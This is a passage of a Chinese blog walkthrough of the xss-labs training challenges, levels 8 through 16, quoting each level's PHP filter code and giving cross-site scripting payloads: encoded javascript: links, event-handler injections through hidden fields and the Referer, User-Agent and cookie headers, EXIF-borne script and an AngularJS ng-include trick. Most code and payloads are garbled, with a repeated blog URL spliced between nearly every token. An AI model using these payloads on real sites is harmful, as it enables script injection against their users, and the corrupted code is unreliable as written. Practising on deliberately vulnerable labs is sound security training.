,$str6https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echohttps://blog.csdn.net/m0_52051132/article/details/ '
(https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/.'">
'https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/?>https://blog.csdn.net/m0_52051132/article/details/?phpechohttps://blog.csdn.net/m0_52051132/article/details/ '

友情链接
'https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/?>https://blog.csdn.net/m0_52051132/article/details/

分析:这次代码先是将字符转换为小写,然后过滤特殊字符和双引号,最后又怕有漏网之 鱼加了一个转义函数输出,所以按常规方法绕几乎不可能成功,代码处的添加友情链接是 突破点,在input框中输入字符提交之后,在友情链接处会载入一个拼接后的a标签,因为 javascript被过滤对其进行编码绕过再点击友情链接即可。

payload为:javascript:alert(https://blog.csdn.net/m0_52051132/article/details//xss/)https://blog.csdn.net/m0_52051132/article/details/

level 9

在这里插入图片描述

源码:

?phpini_set(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/, 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/ =https://blog.csdn.net/m0_52051132/article/details/ strtolower(https://blog.csdn.net/m0_52051132/article/details/$_GEThttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str2https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"script"https://blog.csdn.net/m0_52051132/article/details/,"scr_ipt"https://blog.csdn.net/m0_52051132/article/details/,$strhttps://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str3https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"on"https://blog.csdn.net/m0_52051132/article/details/,"o_n"https://blog.csdn.net/m0_52051132/article/details/,$str2https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str4https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"src"https://blog.csdn.net/m0_52051132/article/details/,"sr_c"https://blog.csdn.net/m0_52051132/article/details/,$str3https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str5https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"data"https://blog.csdn.net/m0_52051132/article/details/,"da_ta"https://blog.csdn.net/m0_52051132/article/details/,$str4https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str6https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"href"https://blog.csdn.net/m0_52051132/article/details/,"hr_ef"https://blog.csdn.net/m0_52051132/article/details/,$str5https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str7https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/'"'https://blog.csdn.net/m0_52051132/article/details/,'"'https://blog.csdn.net/m0_52051132/article/details/,$str6https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echohttps://blog.csdn.net/m0_52051132/article/details/ '
(https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/.'">
'https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/?>https://blog.csdn.net/m0_52051132/article/details/?phpif(https://blog.csdn.net/m0_52051132/article/details/false==https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/strpos(https://blog.csdn.net/m0_52051132/article/details/$str7https://blog.csdn.net/m0_52051132/article/details/,'http://'https://blog.csdn.net/m0_52051132/article/details/))https://blog.csdn.net/m0_52051132/article/details/{https://blog.csdn.net/m0_52051132/article/details/echohttps://blog.csdn.net/m0_52051132/article/details/ '

友情链接
'https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/}https://blog.csdn.net/m0_52051132/article/details/elsehttps://blog.csdn.net/m0_52051132/article/details/{https://blog.csdn.net/m0_52051132/article/details/echohttps://blog.csdn.net/m0_52051132/article/details/ '

友情链接
'https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/}https://blog.csdn.net/m0_52051132/article/details/?>https://blog.csdn.net/m0_52051132/article/details/

分析:这次在上一题的基础上加入了strpos()函数,查找如果url中找到’http’那么会返回找 到位置的位数,自然不会返回0也就不会等于false,那么就可以绕过限制了,但是为什么会 这么做呢?回想了下,应该是让输入框必须要输入合法的URL即带有http的字符串,那么 可以向输入框加进去就可以绕过了。

payload为:javascript:alert(https://blog.csdn.net/m0_52051132/article/details//xss/)https://blog.csdn.net/m0_52051132/article/details///http://

level 10

在这里插入图片描述

源码

?phpini_set(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/, 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/ =https://blog.csdn.net/m0_52051132/article/details/ $_GEThttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str11https://blog.csdn.net/m0_52051132/article/details/ =https://blog.csdn.net/m0_52051132/article/details/ $_GEThttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"t_sort"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str22https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/">"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str11https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str33https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"<"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str22https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echohttps://blog.csdn.net/m0_52051132/article/details/ "

没有找到和"https://blog.csdn.net/m0_52051132/article/details/.htmlspecialchars(https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/."相关的结果.

"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/'
'https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/?

分析:这道题有俩个输出的地方,第一个被实体化过滤,第二个是隐藏表单的"t_sort"参数 即’$str33’,过滤了尖括号,那么就在input标签中触发xss即可,可以用onmouseover或者 是onclick,需要将隐藏表单显示出来触发:

payload为:url后加 &https://blog.csdn.net/m0_52051132/article/details/t_sorthttps://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/xss" οnmοuseοver=alert(/xss/) type="https://blog.csdn.net/m0_52051132/article/details/text"payload为:url后加 &t_sort=xss"https://blog.csdn.net/m0_52051132/article/details/ onclickhttps://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/alert(https://blog.csdn.net/m0_52051132/article/details//xss/)https://blog.csdn.net/m0_52051132/article/details/ typehttps://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/"text"https://blog.csdn.net/m0_52051132/article/details/

level 11

在这里插入图片描述

源码:

body>https://blog.csdn.net/m0_52051132/article/details/h1 alignhttps://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/欢迎来到level11https://blog.csdn.net/m0_52051132/article/details//h1https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/?phpini_set(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/, 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/ =https://blog.csdn.net/m0_52051132/article/details/ $_GEThttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str00https://blog.csdn.net/m0_52051132/article/details/ =https://blog.csdn.net/m0_52051132/article/details/ $_GEThttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"t_sort"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str11https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/$_SERVERhttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/'HTTP_REFERER'https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str22https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/">"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str11https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str33https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"<"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str22https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echohttps://blog.csdn.net/m0_52051132/article/details/ "

没有找到和"https://blog.csdn.net/m0_52051132/article/details/.htmlspecialchars(https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/."相关的结果.

"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/'

分析:hidden隐藏了表单,str与str00都被做了转义,可以对输出的$str33写xss语句, burp抓包改referer即可

payload为:Referer: " οnmοuseοver=alert(/xss/) type="https://blog.csdn.net/m0_52051132/article/details/text

在这里插入图片描述

level 12

源码

?phpini_set(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/, 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/ =https://blog.csdn.net/m0_52051132/article/details/ $_GEThttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str00https://blog.csdn.net/m0_52051132/article/details/ =https://blog.csdn.net/m0_52051132/article/details/ $_GEThttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"t_sort"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str11https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/$_SERVERhttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/'HTTP_USER_AGENT'https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str22https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/">"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str11https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str33https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"<"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str22https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echohttps://blog.csdn.net/m0_52051132/article/details/ "

没有找到和"https://blog.csdn.net/m0_52051132/article/details/.htmlspecialchars(https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/."相关的结果.

"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/'
.https://blog.csdn.net/m0_52051132/article/details/'" type="hidden">.https://blog.csdn.net/m0_52051132/article/details/'" type="hidden">(https://blog.csdn.net/m0_52051132/article/details/$str00https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/.'" type="hidden"> .https://blog.csdn.net/m0_52051132/article/details/$str33https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/'" type="hidden">
'https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

分析:同上题原理,这次我改user-agent就可以了

payload为:User-Agent:" οnclick=alert(/xss/) type="https://blog.csdn.net/m0_52051132/article/details/text

在这里插入图片描述

level 13

在这里插入图片描述
源码

?phpsetcookie(https://blog.csdn.net/m0_52051132/article/details/"user"https://blog.csdn.net/m0_52051132/article/details/, "call me maybe?"https://blog.csdn.net/m0_52051132/article/details/, time(https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/+3600)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/ini_set(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/, 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/ =https://blog.csdn.net/m0_52051132/article/details/ $_GEThttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str00https://blog.csdn.net/m0_52051132/article/details/ =https://blog.csdn.net/m0_52051132/article/details/ $_GEThttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"t_sort"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str11https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/$_COOKIEhttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"user"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str22https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/">"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str11https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str33https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"<"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str22https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echohttps://blog.csdn.net/m0_52051132/article/details/ "

没有找到和"https://blog.csdn.net/m0_52051132/article/details/.htmlspecialchars(https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/."相关的结果.

"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/'
'https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/?>https://blog.csdn.net/m0_52051132/article/details/

分析:同上,改cookie中的user即可

payload为:   " οnfοcus=alert(/xss/) type="https://blog.csdn.net/m0_52051132/article/details/text

在这里插入图片描述

level 14

源码

h1 align=https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/欢迎来到level14/https://blog.csdn.net/m0_52051132/article/details/h1>https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/iframe name=https://blog.csdn.net/m0_52051132/article/details/"leftframe"https://blog.csdn.net/m0_52051132/article/details/ marginwidth=https://blog.csdn.net/m0_52051132/article/details/10https://blog.csdn.net/m0_52051132/article/details/ marginheight=https://blog.csdn.net/m0_52051132/article/details/10https://blog.csdn.net/m0_52051132/article/details/src=https://blog.csdn.net/m0_52051132/article/details/"http://www.exifviewer.org/"https://blog.csdn.net/m0_52051132/article/details/ frameborder=https://blog.csdn.net/m0_52051132/article/details/no width=https://blog.csdn.net/m0_52051132/article/details/"80%"https://blog.csdn.net/m0_52051132/article/details/ scrolling=https://blog.csdn.net/m0_52051132/article/details/"no"https://blog.csdn.net/m0_52051132/article/details/ height=https://blog.csdn.net/m0_52051132/article/details/80https://blog.csdn.net/m0_52051132/article/details/%https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/iframe>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/这关成功后不会自动跳转。成功者a    href=https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/xsschallenge/https://blog.csdn.net/m0_52051132/article/details/level15.https://blog.csdn.net/m0_52051132/article/details/php?https://blog.csdn.net/m0_52051132/article/details/src=https://blog.csdn.net/m0_52051132/article/details/1.https://blog.csdn.net/m0_52051132/article/details/gif>https://blog.csdn.net/m0_52051132/article/details/点我进level15/https://blog.csdn.net/m0_52051132/article/details/a>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/

这一关iframe调用的文件地址失效,已经无法测试了。
这里可以简单复现一下这种触发XSS的环境。
有些网站有读取图片exif(可交换图像文件格式英语:Exchangeable image file format, 官方简称Exif)信息的功能,当网站读取到的恶意的exif信息就会触发这个payload,是专 门为数码相机的照片设定的,可以记录数码照片的属性信息和拍摄数据。可使用鼠标右键 进入属性页面查看部分信息。)我这里先创建一个exifxss.php的文件
然后在当前文件夹下面放一张名为404的正常图片,接着访问一下
http://ip/xss-labs/exifxss.php
在这里插入图片描述

可以看到将图片的exif信息都打印出来了。如果我们将图片的exif信息改成触发xss的 payload呐?

在这里插入图片描述

可以看到已经在图片的exif信息中插入了触发xss的payload了。接下来再次访问试试看
在这里插入图片描述

level 15

在这里插入图片描述

源码:

html ng-https://blog.csdn.net/m0_52051132/article/details/app>https://blog.csdn.net/m0_52051132/article/details/head>https://blog.csdn.net/m0_52051132/article/details/meta charset=https://blog.csdn.net/m0_52051132/article/details/"utf-8"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/scriptsrc=https://blog.csdn.net/m0_52051132/article/details/"https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/ /https://blog.csdn.net/m0_52051132/article/details/script>https://blog.csdn.net/m0_52051132/article/details/script>https://blog.csdn.net/m0_52051132/article/details/window.https://blog.csdn.net/m0_52051132/article/details/alert =https://blog.csdn.net/m0_52051132/article/details/ functionhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/{https://blog.csdn.net/m0_52051132/article/details/confirmhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"完成的不错!"https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/window.https://blog.csdn.net/m0_52051132/article/details/location.https://blog.csdn.net/m0_52051132/article/details/ ;https://blog.csdn.net/m0_52051132/article/details/}https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/script>https://blog.csdn.net/m0_52051132/article/details/title>https://blog.csdn.net/m0_52051132/article/details/欢迎来到level15/https://blog.csdn.net/m0_52051132/article/details/title>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/head>https://blog.csdn.net/m0_52051132/article/details/h1 align=https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/欢迎来到第15https://blog.csdn.net/m0_52051132/article/details/关,自己想个办法走出去吧!/https://blog.csdn.net/m0_52051132/article/details/h1>https://blog.csdn.net/m0_52051132/article/details/p align=https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/img src=https://blog.csdn.net/m0_52051132/article/details/level15.https://blog.csdn.net/m0_52051132/article/details/png>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/p>https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ $_GET[https://blog.csdn.net/m0_52051132/article/details/"src"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo 'https://blog.csdn.net/m0_52051132/article/details/'https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

分析:通过第一行以及我们提交的参数src的值被插入到标签的class属性值中发现 这里用了angular js的ng-include,其作用相当于php的include函数。这里就是将1.gif这 个文件给包含进来。
此处用了ng-include指令的话,先了解一下其具体的用法。

ng-include 指令用于包含外部的 HTML文件。
2、包含的内容将作为指定元素的子节点。
3、ng-include属性的值可以是一个表达式,返回一个文件名。
4、默认情况下,包含的文件需要包含在同一个域名下。

特别值得注意的几点如下:

ng-include,如果单纯指定地址,必须要加引号
2.ng-include,加载外部html,script标签中的内容不执行
3.ng-include,加载外部html中含有style标签样式可以识别

既然这里可以包含html文件,那么也就可以包含之前有过xss漏洞的源文件

pyload为:'level1.https://blog.csdn.net/m0_52051132/article/details/php?https://blog.csdn.net/m0_52051132/article/details/name=https://blog.csdn.net/m0_52051132/article/details/img src=https://blog.csdn.net/m0_52051132/article/details/1https://blog.csdn.net/m0_52051132/article/details/

在这里插入图片描述

level 16

在这里插入图片描述

源码:

<

?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ strtolowerhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$_GET[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str2=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"script"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/"  "https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str3=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/" "https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/"  "https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str2)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str4=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"/"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/"  "https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str3)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str5=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"     "https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/"  "https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str4)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "
"https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/$str5.https://blog.csdn.net/m0_52051132/article/details/"
"https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/img src=https://blog.csdn.net/m0_52051132/article/details/level16.https://blog.csdn.net/m0_52051132/article/details/png>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/phpecho "

payload的长度:"https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/strlenhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$str5)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/"

"https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

分析:过滤不全面很好绕过

将参数值中的script替换成
将参数值中的空格也替换成
将参数值中的/符号替换成

可以用回车来将它们分开。

imgsrc=https://blog.csdn.net/m0_52051132/article/details/111https://blog.csdn.net/m0_52051132/article/details/”onmouseover=https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/‘xss’)https://blog.csdn.net/m0_52051132/article/details/
